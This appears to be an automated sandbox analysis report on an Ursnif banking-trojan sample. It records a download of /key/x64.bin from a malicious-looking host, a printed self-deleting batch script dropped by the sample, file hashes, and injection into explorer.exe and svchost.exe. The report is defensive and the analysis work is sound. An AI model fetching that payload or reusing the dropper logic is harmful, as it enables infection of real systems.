GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 3600
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 26 Feb 2020 21:39:14 GMT
If-None-Match: "06d5b30edecd51:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://groupcreatedt.at/key/x64.bin
GET /key/x64.bin HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: groupcreatedt.at

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

Source Source Port Destination Destination Port JA3 Hash JA3 Description
192.168.35.22 49180 185.85.0.29 www.php.net 443 1d095e68489d3c535297cd8dffb06cb9 Non-Specific Microsoft Socket, Malware Test FP: brazil-malspam-pushes-banload, dhl-malspam-traffic, post-infection-traffic-from-terror-ek-payload, contract-malspam-traffic, cryptowall-traffic, fake-font-update-for-chrome, phishing-malware-run-on-vm, fiesta-ek-post-infection-and-click-fraud-traffic, phishing-malware-sandbox-analysis, angler-ek-traffic, goon-ek-traffic, magnitude-ek-traffic, brazil-malspam-solicitacao-de-orcamento-traffic-example, cryptowall-infection-on-vm, nuclear-ek-traffic, zeus-panda-banker-malspam-traffic, traffic-analysis-pop-quiz, netflix-phishing-traffic, malspam-pushing-remcosrat, sweet-orange-ek-traffic, brazil-malspam-traffic, eitest-hoelflertext-popup-sends-netsupport-manager-rat, eitest-hoeflertext-popup-sends-netsupport-rat, th-run-seamless-rig-ek-sends-ramnit-with-post-infection-traffic, nuclear-ek-from-my-infected-vm, fake-nf-e-malspam-traffic, fake-netflix-login-page-traffic-1st-run, payment-slip-malspam-traffic, rig-ek-traffic, malspam-pushing-smoke-loader, brazil-malspam-traffic-example, smoke-loader-traffic, phishing-malware-run-in-a-vm, boleto-malspam-traffic, infinity-ek-traffic
192.168.35.22 49208 185.85.0.29 www.php.net 443 1d095e68489d3c535297cd8dffb06cb9 Non-Specific Microsoft Socket, Malware Test FP: brazil-malspam-pushes-banload, dhl-malspam-traffic, post-infection-traffic-from-terror-ek-payload, contract-malspam-traffic, cryptowall-traffic, fake-font-update-for-chrome, phishing-malware-run-on-vm, fiesta-ek-post-infection-and-click-fraud-traffic, phishing-malware-sandbox-analysis, angler-ek-traffic, goon-ek-traffic, magnitude-ek-traffic, brazil-malspam-solicitacao-de-orcamento-traffic-example, cryptowall-infection-on-vm, nuclear-ek-traffic, zeus-panda-banker-malspam-traffic, traffic-analysis-pop-quiz, netflix-phishing-traffic, malspam-pushing-remcosrat, sweet-orange-ek-traffic, brazil-malspam-traffic, eitest-hoelflertext-popup-sends-netsupport-manager-rat, eitest-hoeflertext-popup-sends-netsupport-rat, th-run-seamless-rig-ek-sends-ramnit-with-post-infection-traffic, nuclear-ek-from-my-infected-vm, fake-nf-e-malspam-traffic, fake-netflix-login-page-traffic-1st-run, payment-slip-malspam-traffic, rig-ek-traffic, malspam-pushing-smoke-loader, brazil-malspam-traffic-example, smoke-loader-traffic, phishing-malware-run-in-a-vm, boleto-malspam-traffic, infinity-ek-traffic
File name corrawex.exe
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
File Size 322048 bytes
File Type raw G3 data, byte-padded
MD5 0df2d1c29bfee269b458a7ff8364f79f
SHA1 767a97336567afc966588a68aa161f4df29157ec
SHA256 db311c2cdda01c83e73585784a33c17d67a595110d860db83946a6c08113e348
CRC32 B78DED38
Ssdeep 6144:MoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:5TH8ru5kEu9tx/kWtvfFYCE
ClamAV None
Yara
  • embedded_win_api - A non-Windows executable contains win32 API functions names
CAPE Yara None matched
File name 7CDD.bat
Associated Filenames
C:\Users\user\AppData\Local\Temp\F9FA\7CDD.bat
File Size 110 bytes
File Type ASCII text, with CRLF line terminators
MD5 581ffcc720c2952b0c452bec13b9f139
SHA1 7f59f320cc099db0d3e8668940cace056e6a6a31
SHA256 c382a30108870874e67108c0d64d165aece5438c323ba979efe6b3ad9e412d09
CRC32 D189C09E
Ssdeep 3:wxtK6OWRNfeWuVXVUngU64vHXMJATkUEIxSVXSs+n:KRjcVGvvHXMJ2d4l+n
ClamAV None
Yara None matched
CAPE Yara None matched
:36404493
if not exist %1 goto 4258562802
cmd /C "%1 %2"
if errorlevel 1 goto 36404493
:4258562802
del %0
File name corrawex.exe
Associated Filenames
C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe
File Size 322048 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 0116e1cc3ef60e3cb910654c95e1d1c6
SHA1 a9126493e87f3f761efe8ae9aed4cc4e58ed819e
SHA256 ddaa6aba4618362ad65ad4d6eb6d1ff7cc909f9dcb98b0aa2c6627a2a7d5b514
CRC32 588CA946
Ssdeep 6144:BoxAQURWtJ8ru6Cf6kkRrrsNSc6bkuk+QyR3/oOYW39sE6cXsQFqvCE:KTH8ru5kEu9tx/kWtvfFYCE
ClamAV None
Yara None matched
CAPE Yara None matched
File name Cab6E6C.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Cab6E6C.tmp
C:\Users\user\AppData\Local\Temp\Cab6F0A.tmp
File Size 52608 bytes
File Type Microsoft Cabinet archive data, 52608 bytes, 1 file
MD5 ff9672cd98bf5d41722d2d1207344c67
SHA1 98ebe6d49d1d9d4add4bf9219fe2ded40cba33f3
SHA256 756f4d557302e49bce6623db9bd324c7b05c36b8bb884bbefbbe6b7f53422a54
CRC32 2CA25202
Ssdeep 1536:hnbq9Gl2ifWyUQeydcYDAdN6CtfC8KAZc3kJTiD:hnbq9GQQW7NYDZCw5AZc3r
ClamAV None
Yara None matched
CAPE Yara None matched
File name Tar6E6D.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Tar6E6D.tmp
C:\Users\user\AppData\Local\Temp\Tar6F0B.tmp
File Size 125286 bytes
File Type data
MD5 8237156ad13c2cd7c5cc2faa6969fd86
SHA1 e5481457795650900ee04db955c87224e2db32f0
SHA256 1a9094d2695f9bfbbf047639227e94f9e838cb0bee18e14b1aed00054faef825
CRC32 9C009AE7
Ssdeep 1536:oFAWrmqK1EYqbyr0CpXU4SwucWzvVPIM/P/CGv:oBK1LrVXPEcWOMP/D
ClamAV None
Yara None matched
CAPE Yara None matched
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
C:\Users\user\AppData\Local\Temp\Cab78DB.tmp
C:\Users\user\AppData\Local\Temp\Cab859A.tmp
C:\Users\user\AppData\Local\Temp\Cab87BE.tmp
C:\Users\user\AppData\Local\Temp\Cab9E9F.tmp
C:\Users\user\AppData\Local\Temp\CabA4B9.tmp
C:\Users\user\AppData\Local\Temp\CabA509.tmp
C:\Users\user\AppData\Local\Temp\CabA77B.tmp
File Size 57121 bytes
File Type Microsoft Cabinet archive data, 57121 bytes, 1 file
MD5 0ec1dc356bbe2c2cb76e83e51e54c290
SHA1 49b409e5df72dd6d43d6cff0940dcd7a0e9bf576
SHA256 47c69130af70998da627189acc578c2081ebc235eeb4c2c4fcd55e7126a13890
CRC32 E7C735A0
Ssdeep 1536:9ieuRGIYY2/h2OAdzzTP4Mq/HI8/E0IYeDFR3XaWs4:9eBV25Kzzr4zfIl0EDaH4
ClamAV None
Yara None matched
CAPE Yara None matched
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 179946921288e7396f7c25f127bdf1e1
SHA1 01fc713f8527f394ca291b6ba41b2bd446f6a819
SHA256 27b6754bde84ec795c8d6a4bd3de258e8fa6d383c68ab78a20100931b050e872
CRC32 095B4129
Ssdeep 6:kKcxxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:kxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 6e20f5459c11e696164e0ea69005b9af
SHA1 2be3d8244678aeda4c6d17c93910545a9456a295
SHA256 cf63165f1ae40f9aa7d6bb3b67c17c80e33408ff34ddfda94be637b04290530a
CRC32 DAC4BFF0
Ssdeep 6:kKcQ81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:r0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
File name Tar78DC.tmp
Associated Filenames
C:\Users\user\AppData\Local\Temp\Tar78DC.tmp
C:\Users\user\AppData\Local\Temp\Tar859B.tmp
C:\Users\user\AppData\Local\Temp\Tar87BF.tmp
C:\Users\user\AppData\Local\Temp\Tar9EA0.tmp
C:\Users\user\AppData\Local\Temp\TarA4BA.tmp
C:\Users\user\AppData\Local\Temp\TarA50A.tmp
C:\Users\user\AppData\Local\Temp\TarA77C.tmp
File Size 144697 bytes
File Type data
MD5 c1dcbe728573780e2494bdad85364640
SHA1 4eb346a0ef16a5d82921369fb923134afdb6c2ce
SHA256 c308a174d279757b662c990a77b081af05cb4d7587d7e529764dd74013d62106
CRC32 7E692B86
Ssdeep 1536:w860v3gAurbFCLxR09oLRYpHdT20LrVY/jKQu8OXflvu:wvauuxR0aRYlEjKn8ofRu
ClamAV None
Yara None matched
CAPE Yara None matched
File name F0ACCF77CDCBFF39F6191887F6D2D357
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
File Size 1521 bytes
File Type data
MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
CRC32 53112384
Ssdeep 24:f5DuDD02FDuDD0xlGUCpMTlAXLOhT/g+vVp5cVQyPE5LTl79lazjY:hDuDD02FDuDD0xwUCylA7P+vVmQ6gR73
ClamAV None
Yara None matched
CAPE Yara None matched
File name F0ACCF77CDCBFF39F6191887F6D2D357
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
File Size 242 bytes
File Type data
MD5 fa5482c41f91d5e3d0c022044f5acfd8
SHA1 40c1813baf4966001833da057c448e0b146e6b04
SHA256 e246e39be21ad0e4d27702c304cc5c1a73d881f518c152cf635f45e3117432ae
CRC32 C7A8349C
Ssdeep 3:kkFkl7zE/XfllXlE/wJlllH1jdClRRly+MlMJA3++oWctQQlvSGKlNLOl5ln:kKMzkR/lHLB7WJAOXWcaQnK+7
ClamAV None
Yara None matched
CAPE Yara None matched
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 25de4b591009607d8242e75f50029c3f
SHA1 d48cad14c0a65a84ab841e1435cfc7bd266abea5
SHA256 f0b64848903fb275b2931d67730b7a1ffd4d3bf0641fdacbabbcab1946705e0f
CRC32 5A1CF461
Ssdeep 6:kKnQ81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:o0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 cdcec983c026a18f2af5b677bb47eb9d
SHA1 be8ea476c96d79c17a2dc4a247447eb96de2b1ac
SHA256 9b003f2581b91b4052a401eaa31473e705ee2f8ba9731e9b5bbafe829a1c90ca
CRC32 1D90CB4A
Ssdeep 6:kKV/Q81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:S0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
File name 94308059B57B3142E455B38A6EB92015
Associated Filenames
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
File Size 342 bytes
File Type data
MD5 f37fa4bc17f91ee6fb3a77a841a44a68
SHA1 00061356fd1879bcce4ac550faf0655f0856e00b
SHA256 3b0aeadff0ff6284d72d6a5997d038e041677fde523e10a7f9fdcc7879d814ad
CRC32 AE761D1A
Ssdeep 6:kKQXCkQ81pxW4Y+SkQlPlEGYRMY9z+4KlDA3RUe5CAE:Fr0pxWokPlE99SNxAhUe5Y
ClamAV None
Yara None matched
CAPE Yara None matched
Type Injected PE Image: 32-bit executable
Size 33280 bytes
Target Process explorer.exe
Target PID 3064
Target Path C:\Windows\explorer.exe
Injecting Process KmHJvidHgRX.exe
Injecting PID 3064
Path C:\Users\user\AppData\Local\Temp\KmHJvidHgRX.exe
MD5 771bd1b5562e88d58355888269fe3312
SHA1 886c3a89b65bdb719390cec05af05a847ee5f964
SHA256 ce5623261f1f897ee4d66bef3d16db4513afdd51cb2a79d286e52a1e69a6d1c7
CRC32 AF3180BA
Ssdeep 768:wxxjTRHBig+dgoYwlGqr1Jn5a4it97iAa5:wxxT5gdTpGqr7n5a4y9Ja
Yara
  • vmdetect - Possibly employs anti-virtualization techniques
CAPE Yara None matched
Type Injected PE Image: 64-bit executable
Size 26112 bytes
Target Process svchost.exe
Target PID 1308
Target Path C:\Windows\system32\svchost.exe
Injecting Process corrawex.exe
Injecting PID 2980
Path C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
MD5 8dc93214ae61c946839891b5011aba65
SHA1 c6981c264b4c97a5a9329713d0bb43b8b9d4b68e
SHA256 5f7f9ac1bea60fefc34c2815da80424833272405449500fb393438808f7fb104
CRC32 F39E5785
Ssdeep 768:CWkX7q+fpTYvVeZMmn+0C4xiNEbvKtPK:CX5fRuZE53vKtPK
Yara None matched
CAPE Yara None matched
Type Injected Shellcode/Data
Size 792 bytes
Target Process svchost.exe
Target PID 1308
Target Path C:\Windows\system32\svchost.exe
Injecting Process corrawex.exe
Injecting PID 2980
Path C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
MD5 d4c1d64ed64c12f47542acc4564ac2cf
SHA1 44df67f174dd11ec4237e5ac035761eb55df953c
SHA256 b55edc416693e04769013cb5d895bf096f2065cd423116620a31773482c8db05
CRC32 367DD4AF
Ssdeep 6:CYXe/eLuG4E1pS3lllYr/go3sr/gajGkYwfRo+Rln:GBGxPSV/ig3gaKzCbRln
Yara
  • shellcode_patterns - Matched shellcode byte patterns
CAPE Yara None matched
Type Ursnif Payload: 64-bit DLL
Size 249856 bytes
Target Process svchost.exe
Target PID 1308
Target Path C:\Windows\system32\svchost.exe
Injecting Process corrawex.exe
Injecting PID 2980
Path C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
MD5 1ef9eb9cd78e3c28ea41dc332c163ab7
SHA1 337c53135d4bfd4df8bb3bbf10b543dae0667a92
SHA256 1fedc723d7141b515b40234ecf2fe31a5593aff69b7ee9bb225272c95c27245f
CRC32 E1739A13
Ssdeep 6144:bCb3PM7ntLwvLVqLfKyV4bqoJCXZQWbjF:bCb3PmntMVqLCPqoJCXZQWt
Yara None matched
CAPE Yara
  • Ursnif
  • Ursnif Payload
Type Injected PE Image
Size 193536 bytes
Target Process svchost.exe
Target PID 1308
Target Path C:\Windows\system32\svchost.exe
Injecting Process corrawex.exe
Injecting PID 2980
Path C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
MD5 de567fe0dc559c3d4625e2c97a81085c
SHA1 907221d90ad21415c2c08804ba83bce3a2a26cec
SHA256 72f373080da0afbbdb99da6a8705af9150e874a1dbdffeb5287b4f8b6dd3c57c
CRC32 8E9D3FE5
Ssdeep 3072:d3V2mlM4ueaNS/BTUgCuVdboh8i0Cyot00QY6HK2qlalXnOM/S0CVBUy5RkyaErj:d3VraM/uuVdboJQot5QPVqlal+M/wBcg
Yara None matched
CAPE Yara None matched
Type Ursnif Payload: 64-bit DLL
Size 250880 bytes
Target Process svchost.exe
Target PID 1308
Target Path C:\Windows\system32\svchost.exe
Injecting Process corrawex.exe
Injecting PID 2980
Path C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
MD5 c712a107be9744190d3faaf90ddda132
SHA1 669b23ce5fcb7da6740f94c9a66c681cc5c4ab12
SHA256 6929e1a098a590caadd27c5e87a9e8da4b50e427fcb5b4787cac1786a7a0fbb9
CRC32 57D55324
Ssdeep 6144:hb3PM7ntLwvLVqLfKyV4bqoJCXZQWbjFi:hb3PmntMVqLCPqoJCXZQWt
Yara None matched
CAPE Yara
  • Ursnif
  • Ursnif Payload
Type Injected PE Image: 64-bit executable
Size 2861568 bytes
Target Process explorer.exe
Target PID 1708
Target Path C:\Windows\explorer.exe
Injecting Process svchost.exe
Injecting PID 1308
Path C:\Windows\sysnative\svchost.exe
MD5 d3b92246cb77d2708894a21d2168274a
SHA1 f29a60029064b52043723c163fb63d0b47891349
SHA256 64cfb9342e76423f43c8d9d9dc396937c621ed8d1324d4e0632a4ce5d155904e
CRC32 E728EF44
Ssdeep 49152:8xrceI/lIRYraisQhFCU4NuvYYYYYYYYYYYRYYYYYYYYYYE3iA7/eFUJN9ojosod:OrcPlIWy8vYYYYYYYYYYYRYYYYYYYYYh
Yara None matched
CAPE Yara None matched
Type Injected Shellcode/Data
Size 792 bytes
Target Process explorer.exe
Target PID 1708
Target Path C:\Windows\explorer.exe
Injecting Process svchost.exe
Injecting PID 1308
Path C:\Windows\sysnative\svchost.exe
MD5 7b6dbcca8fd4ca9a8cdc6139d62b3ea1
SHA1 4154480a49c0bb86e4b81081bfbaec7613a572bb
SHA256 0715dd3be41f630963318fe2c4d9178322303504734a2e6c4ccfa7b150d93455
CRC32 3AA36F5F
Ssdeep 6:u7LuG1tctuHPk0k8vQ/TpljUEIf/yNMk0k8vQ/KEdIf/yNE3tOin3sG3:uuG16EPG8S1+iOG85i4v3
Yara None matched
CAPE Yara None matched
Sorry! No process dumps.

Processing ( 6.873 seconds )

  • 3.842 CAPE
  • 1.761 BehaviorAnalysis
  • 0.62 Dropped
  • 0.222 Static
  • 0.164 TargetInfo
  • 0.093 Deduplicate
  • 0.092 TrID
  • 0.052 NetworkAnalysis
  • 0.019 Strings
  • 0.007 AnalysisInfo
  • 0.001 Debug

Signatures ( 0.938 seconds )

  • 0.349 antidbg_windows
  • 0.054 decoy_document
  • 0.052 NewtWire Behavior
  • 0.051 api_spamming
  • 0.029 Doppelganging
  • 0.028 antiav_detectreg
  • 0.026 injection_createremotethread
  • 0.025 InjectionCreateRemoteThread
  • 0.019 antivm_vbox_window
  • 0.017 InjectionInterProcess
  • 0.016 injection_runpe
  • 0.015 InjectionProcessHollowing
  • 0.015 antisandbox_script_timer
  • 0.012 injection_explorer
  • 0.012 antivm_generic_disk
  • 0.011 infostealer_ftp
  • 0.01 mimics_filetime
  • 0.01 antivm_generic_scsi
  • 0.01 ransomware_files
  • 0.009 bootkit
  • 0.008 antiemu_wine_func
  • 0.008 dynamic_function_loading
  • 0.007 malicious_dynamic_function_loading
  • 0.007 stealth_file
  • 0.007 reads_self
  • 0.007 virus
  • 0.006 antivm_generic_services
  • 0.006 infostealer_browser_password
  • 0.006 kovter_behavior
  • 0.006 antianalysis_detectreg
  • 0.006 infostealer_im
  • 0.005 hancitor_behavior
  • 0.005 antiav_detectfile
  • 0.005 infostealer_mail
  • 0.005 ransomware_extensions
  • 0.004 exploit_getbasekerneladdress
  • 0.003 antidebug_guardpages
  • 0.003 recon_programs
  • 0.003 exploit_gethaldispatchtable
  • 0.003 persistence_autorun
  • 0.003 antivm_generic_system
  • 0.003 antivm_vbox_keys
  • 0.003 infostealer_bitcoin
  • 0.002 lsass_credential_dumping
  • 0.002 antivm_vbox_libs
  • 0.002 infostealer_browser
  • 0.002 EvilGrab
  • 0.002 shifu_behavior
  • 0.002 stealth_timeout
  • 0.002 antianalysis_detectfile
  • 0.002 antivm_vbox_files
  • 0.002 antivm_vmware_keys
  • 0.002 geodo_banking_trojan
  • 0.002 browser_security
  • 0.002 masquerade_process_name
  • 0.001 tinba_behavior
  • 0.001 uac_bypass_eventvwr
  • 0.001 sets_autoconfig_url
  • 0.001 rat_nanocore
  • 0.001 antiav_avast_libs
  • 0.001 exploit_heapspray
  • 0.001 stack_pivot
  • 0.001 Vidar Behavior
  • 0.001 betabot_behavior
  • 0.001 antisandbox_sunbelt_libs
  • 0.001 ipc_namedpipe
  • 0.001 kibex_behavior
  • 0.001 exec_crash
  • 0.001 Raccoon Behavior
  • 0.001 cerber_behavior
  • 0.001 antivm_generic_diskreg
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vpc_keys
  • 0.001 antivm_xen_keys
  • 0.001 ketrican_regkeys
  • 0.001 modify_proxy
  • 0.001 darkcomet_regkeys
  • 0.001 disables_browser_warn
  • 0.001 network_torgateway
  • 0.001 recon_fingerprint

Reporting ( 0.028 seconds )

  • 0.014 SubmitCAPE
  • 0.014 CompressResults
Task ID 131469
Mongo ID 5e79d80522fb4f13386d7074
Cuckoo release 1.3-CAPE